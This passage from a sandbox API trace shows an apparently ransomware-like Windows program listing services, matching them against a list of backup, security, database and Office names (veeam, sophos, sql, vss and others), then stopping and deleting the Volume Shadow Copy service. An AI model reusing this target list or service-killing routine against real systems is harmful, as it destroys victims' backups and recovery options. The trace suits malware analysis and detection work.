_SubStr="tv_x64.exe") returned 0x0 [0136.055] wcslen (_String="tv_x64.exe") returned 0xa [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="encsvc") returned 0x0 [0136.056] wcslen (_String="encsvc") returned 0x6 [0136.056] wcsstr (_Str="aelookupsvc", _SubStr="sapstartsrv") returned 0x0 [0136.056] wcslen (_String="sapstartsrv") returned 0xb [0136.056] wcsstr (_Str="aelookupsvc", _SubStr="vsnapvss") returned 0x0 [0136.056] wcslen (_String="vsnapvss") returned 0x8 [0136.056] wcsstr (_Str="aelookupsvc", _SubStr="raw_agent_svc") returned 0x0 [0136.056] wcslen (_String="raw_agent_svc") returned 0xd [0136.056] wcsstr (_Str="aelookupsvc", _SubStr="thunderbird") returned 0x0 [0136.056] wcslen (_String="thunderbird") returned 0xb [0136.056] wcsstr (_Str="aelookupsvc", _SubStr="saphostexec ") returned 0x0 [0136.056] wcslen (_String="saphostexec ") returned 0xc [0136.056] _wcslwr (in: _String=0x2d83d4e | out: _String="alg") returned="alg" [0136.056] wcsstr (_Str="alg", _SubStr="vss") returned 0x0 [0136.056] wcslen (_String="vss") returned 0x3 [0136.056] wcsstr (_Str="alg", _SubStr="sql") returned 0x0 [0136.056] wcslen (_String="sql") returned 0x3 [0136.056] wcsstr (_Str="alg", _SubStr="svc$") returned 0x0 [0136.056] wcslen (_String="svc$") returned 0x4 [0136.056] wcsstr (_Str="alg", _SubStr="memtas") returned 0x0 [0136.056] wcslen (_String="memtas") returned 0x6 [0136.056] wcsstr (_Str="alg", _SubStr="mepocs") returned 0x0 [0136.056] wcslen (_String="mepocs") returned 0x6 [0136.056] wcsstr (_Str="alg", _SubStr="sophos") returned 0x0 [0136.056] wcslen (_String="sophos") returned 0x6 [0136.056] wcsstr (_Str="alg", _SubStr="veeam") returned 0x0 [0136.056] wcslen (_String="veeam") returned 0x5 [0136.056] wcsstr (_Str="alg", _SubStr="backup") returned 0x0 [0136.056] wcslen (_String="backup") returned 0x6 [0136.056] wcsstr (_Str="alg", _SubStr="GxVss") returned 0x0 [0136.056] wcslen (_String="GxVss") returned 0x5 [0136.056] wcsstr (_Str="alg", _SubStr="GxBlr") returned 0x0 [0136.056] wcslen (_String="GxBlr") returned 0x5 [0136.056] wcsstr (_Str="alg", _SubStr="GxFWD") returned 0x0 [0136.056] wcslen (_String="GxFWD") returned 0x5 [0136.056] wcsstr (_Str="alg", _SubStr="GxCVD") returned 0x0 [0136.056] wcslen (_String="GxCVD") returned 0x5 [0136.056] wcsstr (_Str="alg", _SubStr="GxCIMgr") returned 0x0 [0136.057] wcslen (_String="GxCIMgr") returned 0x7 [0136.057] wcsstr (_Str="alg", _SubStr="QBCFMonitorService") returned 0x0 [0136.057] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.057] wcsstr (_Str="alg", _SubStr="thebat") returned 0x0 [0136.057] wcslen (_String="thebat") returned 0x6 [0136.057] wcsstr (_Str="alg", _SubStr="dbeng50") returned 0x0 [0136.057] wcslen (_String="dbeng50") returned 0x7 [0136.057] wcsstr (_Str="alg", _SubStr="winword") returned 0x0 [0136.057] wcslen (_String="winword") returned 0x7 [0136.057] wcsstr (_Str="alg", _SubStr="dbsnmp") returned 0x0 [0136.057] wcslen (_String="dbsnmp") returned 0x6 [0136.057] wcsstr (_Str="alg", _SubStr="VeeamTransportSvc") returned 0x0 [0136.057] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.057] wcsstr (_Str="alg", _SubStr="disk+work") returned 0x0 [0136.057] wcslen (_String="disk+work") returned 0x9 [0136.057] wcsstr (_Str="alg", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.057] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.057] wcsstr (_Str="alg", _SubStr="firefox") returned 0x0 [0136.057] wcslen (_String="firefox") returned 0x7 [0136.057] wcsstr (_Str="alg", _SubStr="QBIDPService") returned 0x0 [0136.057] wcslen (_String="QBIDPService") returned 0xc [0136.057] wcsstr (_Str="alg", _SubStr="steam") returned 0x0 [0136.057] wcslen (_String="steam") returned 0x5 [0136.057] wcsstr (_Str="alg", _SubStr="onenote") returned 0x0 [0136.057] wcslen (_String="onenote") returned 0x7 [0136.057] wcsstr (_Str="alg", _SubStr="CVMountd") returned 0x0 [0136.057] wcslen (_String="CVMountd") returned 0x8 [0136.057] wcsstr (_Str="alg", _SubStr="cvd") returned 0x0 [0136.057] wcslen (_String="cvd") returned 0x3 [0136.057] wcsstr (_Str="alg", _SubStr="VeeamDeploymentSvc") returned 0x0 [0136.057] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0136.057] wcsstr (_Str="alg", _SubStr="VeeamNFSSvc") returned 0x0 [0136.057] wcslen (_String="VeeamNFSSvc") returned 0xb [0136.057] wcsstr (_Str="alg", _SubStr="bedbh") returned 0x0 [0136.057] wcslen (_String="bedbh") returned 0x5 [0136.057] wcsstr (_Str="alg", _SubStr="mydesktopqos") returned 0x0 [0136.057] wcslen (_String="mydesktopqos") returned 0xc [0136.058] wcsstr (_Str="alg", _SubStr="avscc") returned 0x0 [0136.058] wcslen (_String="avscc") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="infopath") returned 0x0 [0136.058] wcslen (_String="infopath") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="cvfwd") returned 0x0 [0136.058] wcslen (_String="cvfwd") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="excel") returned 0x0 [0136.058] wcslen (_String="excel") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="beserver") returned 0x0 [0136.058] wcslen (_String="beserver") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="powerpnt") returned 0x0 [0136.058] wcslen (_String="powerpnt") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="mspub") returned 0x0 [0136.058] wcslen (_String="mspub") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="synctime") returned 0x0 [0136.058] wcslen (_String="synctime") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="QBDBMgrN") returned 0x0 [0136.058] wcslen (_String="QBDBMgrN") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="tv_w32.exe") returned 0x0 [0136.058] wcslen (_String="tv_w32.exe") returned 0xa [0136.058] wcsstr (_Str="alg", _SubStr="EnterpriseClient") returned 0x0 [0136.058] wcslen (_String="EnterpriseClient") returned 0x10 [0136.058] wcsstr (_Str="alg", _SubStr="msaccess") returned 0x0 [0136.058] wcslen (_String="msaccess") returned 0x8 [0136.058] wcsstr (_Str="alg", _SubStr="ocssd") returned 0x0 [0136.058] wcslen (_String="ocssd") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="mydesktopservice") returned 0x0 [0136.058] wcslen (_String="mydesktopservice") returned 0x10 [0136.058] wcsstr (_Str="alg", _SubStr="sqbcoreservice") returned 0x0 [0136.058] wcslen (_String="sqbcoreservice") returned 0xe [0136.058] wcsstr (_Str="alg", _SubStr="CVODS") returned 0x0 [0136.058] wcslen (_String="CVODS") returned 0x5 [0136.058] wcsstr (_Str="alg", _SubStr="DellSystemDetect") returned 0x0 [0136.058] wcslen (_String="DellSystemDetect") returned 0x10 [0136.058] wcsstr (_Str="alg", _SubStr="oracle") returned 0x0 [0136.058] wcslen (_String="oracle") returned 0x6 [0136.058] wcsstr (_Str="alg", _SubStr="ocautoupds") returned 0x0 [0136.059] wcslen (_String="ocautoupds") returned 0xa [0136.059] wcsstr (_Str="alg", _SubStr="wordpad") returned 0x0 [0136.059] wcslen (_String="wordpad") returned 0x7 [0136.059] wcsstr (_Str="alg", _SubStr="visio") returned 0x0 [0136.059] wcslen (_String="visio") returned 0x5 [0136.059] wcsstr (_Str="alg", _SubStr="SAP") returned 0x0 [0136.059] wcslen (_String="SAP") returned 0x3 [0136.059] wcsstr (_Str="alg", _SubStr="bengien") returned 0x0 [0136.059] wcslen (_String="bengien") returned 0x7 [0136.059] wcsstr (_Str="alg", _SubStr="TeamViewer.exe") returned 0x0 [0136.059] wcslen (_String="TeamViewer.exe") returned 0xe [0136.059] wcsstr (_Str="alg", _SubStr="agntsvc") returned 0x0 [0136.059] wcslen (_String="agntsvc") returned 0x7 [0136.059] wcsstr (_Str="alg", _SubStr="CagService") returned 0x0 [0136.059] wcslen (_String="CagService") returned 0xa [0136.059] wcsstr (_Str="alg", _SubStr="avagent") returned 0x0 [0136.059] wcslen (_String="avagent") returned 0x7 [0136.059] wcsstr (_Str="alg", _SubStr="ocomm") returned 0x0 [0136.059] wcslen (_String="ocomm") returned 0x5 [0136.059] wcsstr (_Str="alg", _SubStr="outlook") returned 0x0 [0136.059] wcslen (_String="outlook") returned 0x7 [0136.059] wcsstr (_Str="alg", _SubStr="saposcol") returned 0x0 [0136.059] wcslen (_String="saposcol") returned 0x8 [0136.059] wcsstr (_Str="alg", _SubStr="xfssvccon") returned 0x0 [0136.059] wcslen (_String="xfssvccon") returned 0x9 [0136.059] wcsstr (_Str="alg", _SubStr="isqlplussvc") returned 0x0 [0136.059] wcslen (_String="isqlplussvc") returned 0xb [0136.059] wcsstr (_Str="alg", _SubStr="pvlsvr") returned 0x0 [0136.059] wcslen (_String="pvlsvr") returned 0x6 [0136.059] wcsstr (_Str="alg", _SubStr="sql") returned 0x0 [0136.059] wcslen (_String="sql") returned 0x3 [0136.059] wcsstr (_Str="alg", _SubStr="tbirdconfig") returned 0x0 [0136.059] wcslen (_String="tbirdconfig") returned 0xb [0136.059] wcsstr (_Str="alg", _SubStr="vxmon") returned 0x0 [0136.059] wcslen (_String="vxmon") returned 0x5 [0136.059] wcsstr (_Str="alg", _SubStr="benetns") returned 0x0 [0136.059] wcslen (_String="benetns") returned 0x7 [0136.060] wcsstr (_Str="alg", _SubStr="tv_x64.exe") returned 0x0 [0136.060] wcslen (_String="tv_x64.exe") returned 0xa [0136.060] wcsstr (_Str="alg", _SubStr="encsvc") returned 0x0 [0136.060] wcslen (_String="encsvc") returned 0x6 [0136.060] wcsstr (_Str="alg", _SubStr="sapstartsrv") returned 0x0 [0136.060] wcslen (_String="sapstartsrv") returned 0xb [0136.060] wcsstr (_Str="alg", _SubStr="vsnapvss") returned 0x0 [0136.060] wcslen (_String="vsnapvss") returned 0x8 [0136.060] wcsstr (_Str="alg", _SubStr="raw_agent_svc") returned 0x0 [0136.060] wcslen (_String="raw_agent_svc") returned 0xd [0136.060] wcsstr (_Str="alg", _SubStr="thunderbird") returned 0x0 [0136.060] wcslen (_String="thunderbird") returned 0xb [0136.060] wcsstr (_Str="alg", _SubStr="saphostexec ") returned 0x0 [0136.060] wcslen (_String="saphostexec ") returned 0xc [0136.060] _wcslwr (in: _String=0x2d83cf8 | out: _String="appidsvc") returned="appidsvc" [0136.060] wcsstr (_Str="appidsvc", _SubStr="vss") returned 0x0 [0136.060] wcslen (_String="vss") returned 0x3 [0136.060] wcsstr (_Str="appidsvc", _SubStr="sql") returned 0x0 [0136.060] wcslen (_String="sql") returned 0x3 [0136.060] wcsstr (_Str="appidsvc", _SubStr="svc$") returned 0x0 [0136.060] wcslen (_String="svc$") returned 0x4 [0136.060] wcsstr (_Str="appidsvc", _SubStr="memtas") returned 0x0 [0136.060] wcslen (_String="memtas") returned 0x6 [0136.060] wcsstr (_Str="appidsvc", _SubStr="mepocs") returned 0x0 [0136.060] wcslen (_String="mepocs") returned 0x6 [0136.060] wcsstr (_Str="appidsvc", _SubStr="sophos") returned 0x0 [0136.060] wcslen (_String="sophos") returned 0x6 [0136.060] wcsstr (_Str="appidsvc", _SubStr="veeam") returned 0x0 [0136.060] wcslen (_String="veeam") returned 0x5 [0136.060] wcsstr (_Str="appidsvc", _SubStr="backup") returned 0x0 [0136.060] wcslen (_String="backup") returned 0x6 [0136.060] wcsstr (_Str="appidsvc", _SubStr="GxVss") returned 0x0 [0136.060] wcslen (_String="GxVss") returned 0x5 [0136.060] wcsstr (_Str="appidsvc", _SubStr="GxBlr") returned 0x0 [0136.060] wcslen (_String="GxBlr") returned 0x5 [0136.060] wcsstr (_Str="appidsvc", _SubStr="GxFWD") returned 0x0 [0136.061] wcslen (_String="GxFWD") returned 0x5 [0136.061] wcsstr (_Str="appidsvc", _SubStr="GxCVD") returned 0x0 [0136.061] wcslen (_String="GxCVD") returned 0x5 [0136.061] wcsstr (_Str="appidsvc", _SubStr="GxCIMgr") returned 0x0 [0136.061] wcslen (_String="GxCIMgr") returned 0x7 [0136.061] wcsstr (_Str="appidsvc", _SubStr="QBCFMonitorService") returned 0x0 [0136.061] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.061] wcsstr (_Str="appidsvc", _SubStr="thebat") returned 0x0 [0136.061] wcslen (_String="thebat") returned 0x6 [0136.061] wcsstr (_Str="appidsvc", _SubStr="dbeng50") returned 0x0 [0136.061] wcslen (_String="dbeng50") returned 0x7 [0136.061] wcsstr (_Str="appidsvc", _SubStr="winword") returned 0x0 [0136.061] wcslen (_String="winword") returned 0x7 [0136.061] wcsstr (_Str="appidsvc", _SubStr="dbsnmp") returned 0x0 [0136.061] wcslen (_String="dbsnmp") returned 0x6 [0136.061] wcsstr (_Str="appidsvc", _SubStr="VeeamTransportSvc") returned 0x0 [0136.061] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.061] wcsstr (_Str="appidsvc", _SubStr="disk+work") returned 0x0 [0136.061] wcslen (_String="disk+work") returned 0x9 [0136.061] wcsstr (_Str="appidsvc", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.061] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.061] wcsstr (_Str="appidsvc", _SubStr="firefox") returned 0x0 [0136.061] wcslen (_String="firefox") returned 0x7 [0136.061] wcsstr (_Str="appidsvc", _SubStr="QBIDPService") returned 0x0 [0136.061] wcslen (_String="QBIDPService") returned 0xc [0136.061] wcsstr (_Str="appidsvc", _SubStr="steam") returned 0x0 [0136.061] wcslen (_String="steam") returned 0x5 [0136.061] _wcslwr (in: _String=0x2d83cbe | out: _String="appinfo") returned="appinfo" [0136.061] _wcslwr (in: _String=0x2d83c7e | out: _String="appmgmt") returned="appmgmt" [0136.061] _wcslwr (in: _String=0x2d83c36 | out: _String="aspnet_state") returned="aspnet_state" [0136.061] _wcslwr (in: _String=0x2d83be0 | out: _String="audioendpointbuilder") returned="audioendpointbuilder" [0136.061] _wcslwr (in: _String=0x2d83b90 | out: _String="audiosrv") returned="audiosrv" [0136.061] _wcslwr (in: _String=0x2d83b62 | out: _String="axinstsv") returned="axinstsv" [0136.062] _wcslwr (in: _String=0x2d83b1a | out: _String="bdesvc") returned="bdesvc" [0136.062] _wcslwr (in: _String=0x2d83acc | out: _String="bfe") returned="bfe" [0136.062] _wcslwr (in: _String=0x2d83a96 | out: _String="bits") returned="bits" [0136.062] _wcslwr (in: _String=0x2d83a36 | out: _String="browser") returned="browser" [0136.062] _wcslwr (in: _String=0x2d83a04 | out: _String="bthserv") returned="bthserv" [0136.062] _wcslwr (in: _String=0x2d839b8 | out: _String="certpropsvc") returned="certpropsvc" [0136.062] _wcslwr (in: _String=0x2d8394a | out: _String="clr_optimization_v2.0.50727_32") returned="clr_optimization_v2.0.50727_32" [0136.062] _wcslwr (in: _String=0x2d838b2 | out: _String="clr_optimization_v2.0.50727_64") returned="clr_optimization_v2.0.50727_64" [0136.062] _wcslwr (in: _String=0x2d8381a | out: _String="clr_optimization_v4.0.30319_32") returned="clr_optimization_v4.0.30319_32" [0136.062] _wcslwr (in: _String=0x2d83782 | out: _String="clr_optimization_v4.0.30319_64") returned="clr_optimization_v4.0.30319_64" [0136.062] _wcslwr (in: _String=0x2d83714 | out: _String="comsysapp") returned="comsysapp" [0136.062] _wcslwr (in: _String=0x2d836d2 | out: _String="cryptsvc") returned="cryptsvc" [0136.062] _wcslwr (in: _String=0x2d8368e | out: _String="cscservice") returned="cscservice" [0136.062] _wcslwr (in: _String=0x2d8365c | out: _String="dcomlaunch") returned="dcomlaunch" [0136.062] _wcslwr (in: _String=0x2d8360e | out: _String="defragsvc") returned="defragsvc" [0136.062] _wcslwr (in: _String=0x2d835e0 | out: _String="dhcp") returned="dhcp" [0136.062] _wcslwr (in: _String=0x2d835b6 | out: _String="dnscache") returned="dnscache" [0136.062] _wcslwr (in: _String=0x2d83590 | out: _String="dot3svc") returned="dot3svc" [0136.062] _wcslwr (in: _String=0x2d83566 | out: _String="dps") returned="dps" [0136.062] _wcslwr (in: _String=0x2d83522 | out: _String="eaphost") returned="eaphost" [0136.062] _wcslwr (in: _String=0x2d834d4 | out: _String="efs") returned="efs" [0136.062] _wcslwr (in: _String=0x2d8348a | out: _String="ehrecvr") returned="ehrecvr" [0136.062] _wcslwr (in: _String=0x2d8342e | out: _String="ehsched") returned="ehsched" [0136.062] _wcslwr (in: _String=0x2d833ce | out: _String="eventlog") returned="eventlog" [0136.063] _wcslwr (in: _String=0x2d83392 | out: _String="eventsystem") returned="eventsystem" [0136.063] _wcslwr (in: _String=0x2d83366 | out: _String="fax") returned="fax" [0136.063] _wcslwr (in: _String=0x2d8334e | out: _String="fdphost") returned="fdphost" [0136.063] _wcslwr (in: _String=0x2d832fa | out: _String="fdrespub") returned="fdrespub" [0136.063] _wcslwr (in: _String=0x2d83296 | out: _String="fontcache") returned="fontcache" [0136.063] _wcslwr (in: _String=0x2d8323e | out: _String="fontcache3.0.0.0") returned="fontcache3.0.0.0" [0136.063] _wcslwr (in: _String=0x2d831cc | out: _String="gpsvc") returned="gpsvc" [0136.063] _wcslwr (in: _String=0x2d83194 | out: _String="gupdate") returned="gupdate" [0136.063] _wcslwr (in: _String=0x2d83142 | out: _String="gupdatem") returned="gupdatem" [0136.063] _wcslwr (in: _String=0x2d830f0 | out: _String="hidserv") returned="hidserv" [0136.063] _wcslwr (in: _String=0x2d830a6 | out: _String="hkmsvc") returned="hkmsvc" [0136.063] _wcslwr (in: _String=0x2d83036 | out: _String="homegrouplistener") returned="homegrouplistener" [0136.063] _wcslwr (in: _String=0x2d82fec | out: _String="homegroupprovider") returned="homegroupprovider" [0136.063] _wcslwr (in: _String=0x2d82fba | out: _String="idsvc") returned="idsvc" [0136.063] _wcslwr (in: _String=0x2d82f88 | out: _String="ikeext") returned="ikeext" [0136.063] _wcslwr (in: _String=0x2d82f2c | out: _String="ipbusenum") returned="ipbusenum" [0136.063] _wcslwr (in: _String=0x2d82eea | out: _String="iphlpsvc") returned="iphlpsvc" [0136.063] _wcslwr (in: _String=0x2d82ec8 | out: _String="keyiso") returned="keyiso" [0136.063] _wcslwr (in: _String=0x2d82e98 | out: _String="ktmrm") returned="ktmrm" [0136.063] _wcslwr (in: _String=0x2d82e22 | out: _String="lanmanserver") returned="lanmanserver" [0136.063] _wcslwr (in: _String=0x2d82df0 | out: _String="lanmanworkstation") returned="lanmanworkstation" [0136.063] _wcslwr (in: _String=0x2d82dc8 | out: _String="lltdsvc") returned="lltdsvc" [0136.063] _wcslwr (in: _String=0x2d82d6e | out: _String="lmhosts") returned="lmhosts" [0136.063] _wcslwr (in: _String=0x2d82d32 | out: _String="mcx2svc") returned="mcx2svc" [0136.063] _wcslwr (in: _String=0x2d82c9c | out: _String="microsoft sharepoint workspace audit service") returned="microsoft sharepoint workspace audit service" [0136.064] _wcslwr (in: _String=0x2d82c36 | out: _String="mmcss") returned="mmcss" [0136.064] _wcslwr (in: _String=0x2d82bda | out: _String="mozillamaintenance") returned="mozillamaintenance" [0136.064] _wcslwr (in: _String=0x2d82b94 | out: _String="mpssvc") returned="mpssvc" [0136.064] _wcslwr (in: _String=0x2d82b66 | out: _String="msdtc") returned="msdtc" [0136.064] _wcslwr (in: _String=0x2d82b0e | out: _String="msiscsi") returned="msiscsi" [0136.064] _wcslwr (in: _String=0x2d82ab6 | out: _String="msiserver") returned="msiserver" [0136.064] _wcslwr (in: _String=0x2d82a80 | out: _String="napagent") returned="napagent" [0136.064] _wcslwr (in: _String=0x2d82a2e | out: _String="netlogon") returned="netlogon" [0136.064] _wcslwr (in: _String=0x2d82a0e | out: _String="netman") returned="netman" [0136.064] _wcslwr (in: _String=0x2d829c4 | out: _String="netmsmqactivator") returned="netmsmqactivator" [0136.064] _wcslwr (in: _String=0x2d8296e | out: _String="netpipeactivator") returned="netpipeactivator" [0136.064] _wcslwr (in: _String=0x2d82928 | out: _String="netprofm") returned="netprofm" [0136.064] _wcslwr (in: _String=0x2d828de | out: _String="nettcpactivator") returned="nettcpactivator" [0136.064] _wcslwr (in: _String=0x2d82888 | out: _String="nettcpportsharing") returned="nettcpportsharing" [0136.064] _wcslwr (in: _String=0x2d82840 | out: _String="nlasvc") returned="nlasvc" [0136.064] _wcslwr (in: _String=0x2d82802 | out: _String="nsi") returned="nsi" [0136.064] _wcslwr (in: _String=0x2d827b6 | out: _String="ose64") returned="ose64" [0136.064] _wcslwr (in: _String=0x2d82776 | out: _String="osppsvc") returned="osppsvc" [0136.064] _wcslwr (in: _String=0x2d8271c | out: _String="p2pimsvc") returned="p2pimsvc" [0136.064] _wcslwr (in: _String=0x2d826cc | out: _String="p2psvc") returned="p2psvc" [0136.064] _wcslwr (in: _String=0x2d8268c | out: _String="pcasvc") returned="pcasvc" [0136.064] _wcslwr (in: _String=0x2d82624 | out: _String="peerdistsvc") returned="peerdistsvc" [0136.064] _wcslwr (in: _String=0x2d825fa | out: _String="perfhost") returned="perfhost" [0136.064] _wcslwr (in: _String=0x2d825b8 | out: _String="pla") returned="pla" [0136.064] _wcslwr (in: _String=0x2d82572 | out: _String="plugplay") returned="plugplay" [0136.064] _wcslwr (in: _String=0x2d8253e | out: _String="pnrpautoreg") returned="pnrpautoreg" [0136.065] _wcslwr (in: _String=0x2d824e2 | out: _String="pnrpsvc") returned="pnrpsvc" [0136.065] _wcslwr (in: _String=0x2d8248e | out: _String="policyagent") returned="policyagent" [0136.065] _wcslwr (in: _String=0x2d8245c | out: _String="power") returned="power" [0136.065] _wcslwr (in: _String=0x2d82440 | out: _String="profsvc") returned="profsvc" [0136.065] _wcslwr (in: _String=0x2d823f4 | out: _String="protectedstorage") returned="protectedstorage" [0136.065] _wcslwr (in: _String=0x2d823c4 | out: _String="qwave") returned="qwave" [0136.065] _wcslwr (in: _String=0x2d82366 | out: _String="rasauto") returned="rasauto" [0136.065] _wcslwr (in: _String=0x2d8230c | out: _String="rasman") returned="rasman" [0136.065] _wcslwr (in: _String=0x2d822b0 | out: _String="remoteaccess") returned="remoteaccess" [0136.065] _wcslwr (in: _String=0x2d8225e | out: _String="remoteregistry") returned="remoteregistry" [0136.065] _wcslwr (in: _String=0x2d82224 | out: _String="rpceptmapper") returned="rpceptmapper" [0136.065] _wcslwr (in: _String=0x2d821e6 | out: _String="rpclocator") returned="rpclocator" [0136.065] _wcslwr (in: _String=0x2d82192 | out: _String="rpcss") returned="rpcss" [0136.065] _wcslwr (in: _String=0x2d8214e | out: _String="samss") returned="samss" [0136.065] _wcslwr (in: _String=0x2d82108 | out: _String="scardsvr") returned="scardsvr" [0136.065] _wcslwr (in: _String=0x2d820e0 | out: _String="schedule") returned="schedule" [0136.065] _wcslwr (in: _String=0x2d820aa | out: _String="scpolicysvc") returned="scpolicysvc" [0136.065] _wcslwr (in: _String=0x2d82068 | out: _String="sdrsvc") returned="sdrsvc" [0136.065] _wcslwr (in: _String=0x2d82038 | out: _String="seclogon") returned="seclogon" [0136.065] _wcslwr (in: _String=0x2d8200e | out: _String="sens") returned="sens" [0136.065] _wcslwr (in: _String=0x2d81fb8 | out: _String="sensrsvc") returned="sensrsvc" [0136.065] _wcslwr (in: _String=0x2d81f7a | out: _String="sessionenv") returned="sessionenv" [0136.065] _wcslwr (in: _String=0x2d81f26 | out: _String="sharedaccess") returned="sharedaccess" [0136.065] _wcslwr (in: _String=0x2d81ec0 | out: _String="shellhwdetection") returned="shellhwdetection" [0136.065] _wcslwr (in: _String=0x2d81e7c | out: _String="snmptrap") returned="snmptrap" [0136.066] _wcslwr (in: _String=0x2d81e58 | out: _String="spooler") returned="spooler" [0136.066] _wcslwr (in: _String=0x2d81e2e | out: _String="sppsvc") returned="sppsvc" [0136.066] _wcslwr (in: _String=0x2d81dee | out: _String="sppuinotify") returned="sppuinotify" [0136.066] _wcslwr (in: _String=0x2d81dac | out: _String="ssdpsrv") returned="ssdpsrv" [0136.066] _wcslwr (in: _String=0x2d81d7e | out: _String="sstpsvc") returned="sstpsvc" [0136.066] _wcslwr (in: _String=0x2d81d1e | out: _String="stisvc") returned="stisvc" [0136.066] _wcslwr (in: _String=0x2d81cce | out: _String="storsvc") returned="storsvc" [0136.066] _wcslwr (in: _String=0x2d81ca2 | out: _String="swprv") returned="swprv" [0136.066] _wcslwr (in: _String=0x2d81c42 | out: _String="sysmain") returned="sysmain" [0136.066] _wcslwr (in: _String=0x2d81c06 | out: _String="tabletinputservice") returned="tabletinputservice" [0136.066] _wcslwr (in: _String=0x2d81bc6 | out: _String="tapisrv") returned="tapisrv" [0136.066] _wcslwr (in: _String=0x2d81baa | out: _String="tbs") returned="tbs" [0136.066] _wcslwr (in: _String=0x2d81b6e | out: _String="termservice") returned="termservice" [0136.066] _wcslwr (in: _String=0x2d81b30 | out: _String="themes") returned="themes" [0136.066] _wcslwr (in: _String=0x2d81b0a | out: _String="threadorder") returned="threadorder" [0136.066] _wcslwr (in: _String=0x2d81ace | out: _String="trkwks") returned="trkwks" [0136.066] _wcslwr (in: _String=0x2d81a6a | out: _String="trustedinstaller") returned="trustedinstaller" [0136.066] _wcslwr (in: _String=0x2d81a22 | out: _String="ui0detect") returned="ui0detect" [0136.066] _wcslwr (in: _String=0x2d819ca | out: _String="umrdpservice") returned="umrdpservice" [0136.066] _wcslwr (in: _String=0x2d81956 | out: _String="upnphost") returned="upnphost" [0136.066] _wcslwr (in: _String=0x2d81928 | out: _String="uxsms") returned="uxsms" [0136.066] _wcslwr (in: _String=0x2d818c8 | out: _String="vaultsvc") returned="vaultsvc" [0136.066] _wcslwr (in: _String=0x2d8189a | out: _String="vds") returned="vds" [0136.066] _wcslwr (in: _String=0x2d81878 | out: _String="vss") returned="vss" [0136.066] OpenServiceW (hSCManager=0x4ebed8, lpServiceName="vss", dwDesiredAccess=0x10020) returned 0x4ebf00 [0136.067] ControlService (in: hService=0x4ebf00, dwControl=0x1, lpServiceStatus=0x3ff8ac | out: lpServiceStatus=0x3ff8ac*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0136.073] DeleteService (hService=0x4ebf00) returned 1 [0136.075] CloseServiceHandle (hSCObject=0x4ebf00) returned 1 [0136.075] _wcslwr (in: _String=0x2d81842 | out: _String="w32time") returned="w32time" [0136.075] _wcslwr (in: _String=0x2d81816 | out: _String="wbengine") returned="wbengine" [0136.076] _wcslwr (in: _String=0x2d817c0 | out: _String="wbiosrvc") returned="wbiosrvc" [0136.076] _wcslwr (in: _String=0x2d8177c | out: _String="wcncsvc") returned="wcncsvc" [0136.076] _wcslwr (in: _String=0x2d8170c | out: _String="wcspluginservice") returned="wcspluginservice" [0136.076] _wcslwr (in: _String=0x2d816c4 | out: _String="wdiservicehost") returned="wdiservicehost" [0136.076] _wcslwr (in: _String=0x2d81678 | out: _String="wdisystemhost") returned="wdisystemhost" [0136.076] _wcslwr (in: _String=0x2d81636 | out: _String="webclient") returned="webclient" [0136.076] _wcslwr (in: _String=0x2d81614 | out: _String="wecsvc") returned="wecsvc" [0136.076] _wcslwr (in: _String=0x2d815c8 | out: _String="wercplsupport") returned="wercplsupport" [0136.076] _wcslwr (in: _String=0x2d81552 | out: _String="wersvc") returned="wersvc" [0136.076] _wcslwr (in: _String=0x2d814fe | out: _String="windefend") returned="windefend" [0136.076] _wcslwr (in: _String=0x2d814b4 | out: _String="winhttpautoproxysvc") returned="winhttpautoproxysvc" [0136.076] _wcslwr (in: _String=0x2d81452 | out: _String="winmgmt") returned="winmgmt" [0136.076] _wcslwr (in: _String=0x2d81400 | out: _String="winrm") returned="winrm" [0136.076] _wcslwr (in: _String=0x2d8139c | out: _String="wlansvc") returned="wlansvc" [0136.076] _wcslwr (in: _String=0x2d8136a | out: _String="wmiapsrv") returned="wmiapsrv" [0136.076] _wcslwr (in: _String=0x2d8131e | out: _String="wmpnetworksvc") returned="wmpnetworksvc" [0136.076] _wcslwr (in: _String=0x2d812b6 | out: _String="wpcsvc") returned="wpcsvc" [0136.076] _wcslwr (in: _String=0x2d8127c | out: _String="wpdbusenum") returned="wpdbusenum" [0136.076] _wcslwr (in: _String=0x2d81228 | out: _String="wscsvc") returned="wscsvc" [0136.076] _wcslwr (in: _String=0x2d811f8 | out: _String="wsearch") returned="wsearch" [0136.076] _wcslwr (in: _String=0x2d811c8 | out: _String="wuauserv") returned="wuauserv" [0136.076] _wcslwr (in: _String=0x2d8119a | out: _String="wudfsvc") returned="wudfsvc" [0136.076] _wcslwr (in: _String=0x2d8111c | out: _String="wwansvc") returned="wwansvc" [0136.076] CloseServiceHandle (hSCObject=0x4ebed8) returned 1 [0136.077] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d7f5a8) returned 1 [0136.077] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5148a0) returned 1 [0136.077] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x2da43c8 [0136.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2da43c8, Length=0x400, ResultLength=0x3ff8d4 | out: SystemInformation=0x2da43c8, ResultLength=0x3ff8d4*=0x116f8) returned 0xc0000004 [0136.078] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, 